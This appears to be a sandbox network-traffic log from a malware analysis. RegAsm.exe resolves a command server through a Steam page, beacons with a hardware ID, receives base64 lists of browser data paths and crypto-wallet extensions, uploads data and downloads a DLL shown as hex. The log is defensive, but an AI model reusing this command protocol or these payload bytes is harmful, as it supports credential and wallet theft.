2024-04-24 14:47:59 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 24 Apr 2024 14:47:59 GMT Content-Length: 33805 Connection: close Set-Cookie: sessionid=b85d43c577d36bd8f2513319; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C8efca4b9dedd65f9ac922759639cacad; Path=/; Secure; HttpOnly; SameSite=None
2024-04-24 14:47:59 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-24 14:47:59 UTC	10062	IN	Data Raw: 6c 6c 64 6f 77 6e 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 Data Ascii: lldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-24 14:47:59 UTC	9229	IN	Data Raw: 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 Data Ascii: partner.steamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STOR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:00 UTC	171	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:02 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:02 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 45 30 39 38 39 35 46 38 31 36 32 32 33 35 37 33 34 35 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="hwid"5EE09895F8162235734526-a33c7340-61ca-11ee-8c18-806e6f6e6963------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------
2024-04-24 14:48:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:03 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|784306c6c99f55cc3dc680af39061eca\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:04 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:04 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HDGHJEBFBFHIIECAECGHCont
2024-04-24 14:48:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:07 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:08 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:08 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------KJKKKJJJKJKFHJJJJECBCont
2024-04-24 14:48:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:09 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:10 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 5753 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:10 UTC	5753	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 34 33 30 36 63 36 63 39 39 66 35 35 63 63 33 64 63 36 38 30 61 66 33 39 30 36 31 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"784306c6c99f55cc3dc680af39061eca------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGCGDBGCAAEBFIECGHDCont
2024-04-24 14:48:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-24 14:48:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:48:11 UTC	179	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-24 14:48:20 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:48:12 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT Connection: close ETag: "66264d40-258600" Accept-Ranges: bytes
2024-04-24 14:48:20 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-24 14:48:21 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-24 14:48:22 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-24 14:48:22 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-24 14:48:22 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-24 14:48:22 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
